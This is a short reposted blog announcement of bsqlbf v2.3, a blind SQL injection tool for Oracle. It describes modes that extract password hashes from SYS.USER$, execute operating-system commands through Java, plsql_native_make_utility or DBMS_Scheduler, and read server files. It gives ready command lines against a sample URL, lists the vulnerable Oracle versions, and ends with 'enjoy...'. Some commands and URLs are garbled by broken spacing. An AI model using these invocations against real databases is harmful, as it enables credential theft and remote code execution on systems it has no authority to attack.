Bsqlbf v 2.3 with enhanced Oracle Exploitation

from: http://www.pcsec.org/archives/Bsqlbf-v-23-With-Enhanced-Oracle-Exploitation.html

A new version of bsqlbf is now available. The following are the new additions:

 

Posted by Sid

 

-------------------- Type: type of injection: 3: Type 3 is Extracting data with DBA privileges (E.g. Oracle password hashes from SYS. User $) 4: Type 4 is O.s Code Execution (Default: Ping 127.0.0.1) 5: Type 5 is Reading o.s files (Default: C: \ Boot. INI) -------------------- type 4 (o.s code execution) supports the following sub types:-stype: How you want to execute command: 0: stype 0 (default) is based onJava , Universal but won't work against xe1: stype 1 against Oracle 9 with plsql_native_make_utility 2: stype 2 against Oracle 10 with DBMS_Scheduler 

--------

Examples:

./Bsqlbf-v2.3.pl-URL http: // 192.168.1.1/injection. jsp/1.jsp? P = 1-type 3-match "true"-SQL "select password from SYS. User $ where rownum = 1 ″

./Bsqlbf-v2.3.pl-URL http: // 192.168.1.1/injection. jsp/1.jsp? P = 1-type 4-match "true"-cmd "ping notsosecure.com"

./Bsqlbf-v2.3.pl-URL http: // 192.168.1.1/injecti. jsp/1.jsp? P = 1-type 5-match "true"-file "c: \ Boot. ini"

-------

download from project homepage: http://code.google.com/p/bsqlbf-v2/

-------

all these additions are based on dbms_export_extension exploit. this will work against the following Oracle versions:

Oracle 8.1.7.4, 9.2.0.1-9.2.0.7, 10.1.0.2-10.1.0.4, 10.2.0.1-10.2.0.2, Xe

--------

enjoy...